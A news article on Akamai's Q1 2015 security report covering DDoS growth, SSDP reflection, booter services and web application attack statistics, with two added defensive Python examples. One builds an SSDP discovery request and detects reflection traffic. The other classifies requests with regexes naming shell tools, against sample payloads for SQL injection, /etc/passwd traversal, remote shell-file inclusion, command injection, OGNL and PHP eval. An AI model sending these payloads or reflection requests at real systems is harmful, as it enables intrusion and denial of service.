
Akamai report: DDoS attacks doubled in Q1 2015, SSDP top attack vector

Akamai Technologies published its 2015 State of the Internet Security report, which says DDoS attacks have more than doubled in the first quarter of 2015.

The number of distributed denial-of-service (DDoS) attacks in first quarter of 2015 more than doubled the number of DDoS attacks in Q1 of 2014, according to Akamai Technologies' Q1 2015 State of the Internet Security report.

8 mega DDoS attacks in first quarter of 2015

Eight mega attacks were launched against Akamai customers, with the largest measuring almost 170 Gbps. "The significant increase in potential peak attack traffic suggests attackers have been developing new ways to maximize impact," Akamai said. "As more advanced, potent tools become available, unskilled adversaries could become capable of much more damaging assaults." Akamai also warned that, as IPv6 adoption grows, attackers may gain a larger and potentially more effective DDoS attack surface.

Mega-attacks aside, the typical attack profile has shifted: the average DDoS attack now uses less bandwidth but lasts 24 hours or more.

The gaming industry was again hit with the largest share of attacks, as five of those mega attacks "listed as Internet & Telecom were actually targeting gaming sites hosted on the customer network." All but one contained SYN floods. Gaming has been the most targeted industry since Q2 2014; the software and technology industry was next, followed by the Internet and telecom industry. Akamai noted, "Infrastructure attacks increased 125% year over year, making up 91% of total DDoS attacks."

DDoS attack most targeted industries

DDoS attack vectors have changed as exploiting the Simple Service Discovery Protocol (SSDP) has become the top attack vector; SSDP attacks "represented the top overall infrastructure-based attack, bypassing SYN floods, which was the top attack vector in Q4 2014."

There's no shortage of devices running SSDP, as the protocol "comes enabled on millions of home and office devices—including routers, media servers, web cams, smart TVs and printers—to allow them to discover each other on a network, establish communication and coordinate activities." Akamai said, "Not only is this attack easy for malicious actors to execute, but the number of vulnerable reflectors does not appear to be diminishing." Attackers armed with a list of Internet-exposed SSDP responders send small discovery requests to each of them with the victim's address spoofed as the source; every device then answers the victim with larger replies, so the devices act as reflectors that both hide the attacker and amplify the traffic.
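The reflection mechanism just described, as an added example that is not code from the Akamai report: it builds the standard SSDP M-SEARCH request, estimates the bandwidth amplification a typical router yields when it answers `ST: ssdp:all` with one reply per advertised service, and then scans flow records for the reflection signature (many distinct hosts sending UDP traffic from source port 1900 to one destination that never asked for it). All addresses, byte counts, service lists and reply headers below are constructed for illustration.

```python
# Added example (not from the Akamai report): SSDP amplification estimate and
# a flow-record check for reflection traffic. All data here is constructed.
from collections import defaultdict
from typing import NamedTuple


class Flow(NamedTuple):
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str
    packets: int
    octets: int


# The standard UPnP discovery request. In a reflection attack it is sent to each
# reflector with the victim's address spoofed as the UDP source.
M_SEARCH = (
    "M-SEARCH * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    'MAN: "ssdp:discover"\r\n'
    "MX: 1\r\n"
    "ST: ssdp:all\r\n\r\n"
).encode()


def ssdp_reply(service_type, location="http://192.168.1.1:1900/rootDesc.xml"):
    """One unicast 200 OK of the kind a UPnP device returns per advertised
    service. Header values are constructed, not captured from a real device."""
    return (
        "HTTP/1.1 200 OK\r\n"
        "CACHE-CONTROL: max-age=1800\r\n"
        "EXT:\r\n"
        f"LOCATION: {location}\r\n"
        "SERVER: Linux/3.x UPnP/1.0 ExampleRouter/1.0\r\n"
        f"ST: {service_type}\r\n"
        f"USN: uuid:00000000-0000-0000-0000-000000000000::{service_type}\r\n\r\n"
    ).encode()


# A home router advertises its root device plus embedded devices and services;
# "ST: ssdp:all" asks for one reply per entry, which is where the gain comes from.
EXAMPLE_SERVICES = [
    "upnp:rootdevice",
    "urn:schemas-upnp-org:device:InternetGatewayDevice:1",
    "urn:schemas-upnp-org:device:WANDevice:1",
    "urn:schemas-upnp-org:device:WANConnectionDevice:1",
    "urn:schemas-upnp-org:service:Layer3Forwarding:1",
    "urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1",
    "urn:schemas-upnp-org:service:WANIPConnection:1",
    "urn:schemas-upnp-org:service:WANPPPConnection:1",
]


def amplification_factor(request, replies):
    """Bandwidth amplification: payload bytes emitted per request payload byte."""
    return sum(len(r) for r in replies) / len(request)


def example_amplification():
    """Gain of one M-SEARCH against the constructed router above."""
    return amplification_factor(M_SEARCH, [ssdp_reply(st) for st in EXAMPLE_SERVICES])


def find_ssdp_reflection(flows, min_reflectors=3, min_octets=10_000):
    """Return {victim_ip: (distinct_reflectors, octets)} for destinations that
    receive UDP traffic sourced from port 1900 by many distinct hosts. A host
    that never sent M-SEARCH should see none of this; a wide fan-in is the
    reflection signature. A single LAN device answering one client is normal."""
    by_victim = defaultdict(lambda: [set(), 0])
    for f in flows:
        if f.proto == "udp" and f.src_port == 1900 and f.dst_port != 1900:
            by_victim[f.dst_ip][0].add(f.src_ip)
            by_victim[f.dst_ip][1] += f.octets
    return {
        ip: (len(srcs), octets)
        for ip, (srcs, octets) in by_victim.items()
        if len(srcs) >= min_reflectors and octets >= min_octets
    }


# Constructed flow records: five reflectors hitting 203.0.113.10:80, one normal
# LAN discovery reply, and an unrelated DNS query from the victim.
SAMPLE_FLOWS = [
    Flow("198.51.100.7", 1900, "203.0.113.10", 80, "udp", 40, 12000),
    Flow("198.51.100.23", 1900, "203.0.113.10", 80, "udp", 38, 11400),
    Flow("198.51.100.88", 1900, "203.0.113.10", 80, "udp", 41, 12300),
    Flow("192.0.2.15", 1900, "203.0.113.10", 80, "udp", 40, 12000),
    Flow("192.0.2.200", 1900, "203.0.113.10", 80, "udp", 39, 11700),
    Flow("192.168.1.20", 1900, "192.168.1.5", 54321, "udp", 3, 900),
    Flow("203.0.113.10", 41234, "192.0.2.53", 53, "udp", 1, 70),
]

if __name__ == "__main__":
    print(f"M-SEARCH payload: {len(M_SEARCH)} bytes")
    print(f"amplification vs. constructed router: {example_amplification():.1f}x")
    print("reflection victims:", find_ssdp_reflection(SAMPLE_FLOWS))
```

The 94-byte request and the roughly twenty-fold gain are payload-only figures; on the wire each reply also carries its own IP/UDP headers, so the real ratio is somewhat higher. The flow check deliberately keys on the reply direction (source port 1900) rather than on M-SEARCH itself, because a victim never sees the spoofed requests, only the answers.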

DDoS attack type in Q1 2015

Listed under the "attack spotlight" for Q1 2015, Akamai said, "attacks targeting an Akamai property were traced to a group of DDoS attack services found in the DDoS-for-hire market. These booter/stresser sites appear to make use of shared attack scripts found in underground forums. Booters evolved in the multi-player online game world, as DDoS attacks aimed at evicting, or booting, a player from a site. Malicious actors have made these attacks available for sale."

Last year, peak attack traffic from booter/stresser sites was about 10-20 Gbps. Now the attack sites are "more dangerous, capable of launching attacks in excess of 100 Gbps. With new reflection attack methods being added continually, such as SSDP, the potential damage from these is expected to continue increasing over time."

Top booter attack vectors in Q1 2015

Web app attacks

Akamai focused its analysis on seven common web application attack vectors: SQL injection (SQLi), local file inclusion (LFI), remote file inclusion (RFI), PHP injection (PHPi), command injection (CMDi), Java injection (JAVAi) abusing Object Graph Navigation Language (OGNL), and malicious file upload (MFU). Together they accounted for 178.85 million web app attacks.

Among the application attacks Akamai analyzed for the Q1 2015 report, "163.62 million were sent over (unencrypted) http. This represented 91.48% of the application attacks." There were 15.23 million attacks over HTTPS, with LFI being the top attack vector at 71.54%, followed by SQLi at 24.20%.
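As an added example, not code from Akamai or its report, here is a small classifier that sorts URL-decoded request paths into six of the seven buckets listed above and tallies them by scheme, the way the report splits HTTP from HTTPS. Malicious file upload is identified from the request body, which an access log does not carry, so it is omitted. The log lines and signatures are constructed for illustration and are far narrower than a production WAF ruleset; a request that matches several signatures is counted under the first one that fires.

```python
# Added example (not from the Akamai report): classify access-log requests into
# the report's web application attack vectors and tally them per scheme.
import re
from collections import Counter
from urllib.parse import unquote_plus

# Minimal, constructed signatures for six of the seven vectors. Order matters:
# the first match wins, so the more specific patterns come first.
SIGNATURES = [
    ("SQLi", re.compile(
        r"union\s+(all\s+)?select|'\s*or\s+'?\d+'?\s*=\s*'?\d+|sleep\(\d+\)|--\s*$|/\*.*\*/",
        re.I)),
    ("LFI", re.compile(r"(\.\./){2,}|/etc/passwd|php://filter", re.I)),
    ("RFI", re.compile(r"=\s*(https?|ftp)://[^&\s]+\.(php|txt)", re.I)),
    ("PHPi", re.compile(r"<\?php|\beval\(|php://input", re.I)),
    ("CMDi", re.compile(r"[;|`]\s*(cat|id|wget|curl|nc|sh|bash|ping)\b|\$\([^)]*\)", re.I)),
    ("JAVAi", re.compile(r"%\{|#_memberAccess|@java\.lang\.", re.I)),
]


def classify(path):
    """Return the attack vector name for a request path, or None if benign.
    Decoding first matters: nearly every real payload arrives percent-encoded."""
    decoded = unquote_plus(path)
    for name, pattern in SIGNATURES:
        if pattern.search(decoded):
            return name
    return None


def attack_share(lines):
    """Tally classified attacks per scheme from constructed log lines of the
    form '<scheme> <method> <path> <status>'. Returns (total, per_scheme)."""
    per_scheme = {"http": Counter(), "https": Counter()}
    for line in lines:
        scheme, _method, path, _status = line.split()
        vector = classify(path)
        if vector:
            per_scheme[scheme][vector] += 1
    total = sum(sum(c.values()) for c in per_scheme.values())
    return total, per_scheme


# Constructed log lines: six attacks across four vectors on HTTP, two on HTTPS,
# and one benign search request.
SAMPLE_LOG = [
    "http GET /products.php?id=1%27%20OR%20%271%27%3D%271 200",
    "https GET /index.php?page=../../../../etc/passwd 200",
    "http GET /index.php?page=http%3A%2F%2F203.0.113.5%2Fshell.txt 500",
    "https GET /search.php?q=test 200",
    "http GET /cgi-bin/ping.cgi?host=127.0.0.1%3Bid 200",
    "http POST /login.action?name=%25%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29%7D 200",
    "https GET /page.php?cmd=%3C%3Fphp%20eval%28%24_GET%5B%27c%27%5D%29%3B%20%3F%3E 200",
]

if __name__ == "__main__":
    total, per_scheme = attack_share(SAMPLE_LOG)
    for scheme, counts in per_scheme.items():
        share = 100 * sum(counts.values()) / total
        print(f"{scheme:5s} {share:5.1f}%  {dict(counts)}")
```

The per-scheme split is the part worth keeping: as the report's own numbers show, most attack traffic still arrives unencrypted, but a WAF that only inspects port 80 misses the LFI and SQLi that arrive over TLS, so the classifier has to run after decryption.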

Attacker source countries

At 23.45%, China was again the top source country for DDoS attacks; Germany was responsible for 17.39% and the U.S. for 12.18%. "Combined, China, Germany and the U.S. accounted for more than 50% of attacking IPs in this quarter," Akamai wrote.

Top source countries for DDoS attacks in Q1 2015

Yet when it comes to the top countries responsible for web app attacks, the U.S. was the top source country of attacking IPs at 52.42%, followed by China (11.39%), Brazil (6.09%) and India (5.33%).

Top 10 countries behind web app attacks

It might then come as no surprise that the U.S. was also the most targeted for web app attacks with a whopping 81.61% in Q1 2015.

Top 10 target countries for web app attacks

Akamai's full Q1 2015 State of the Internet Security report, always an interesting read, is available from Akamai.
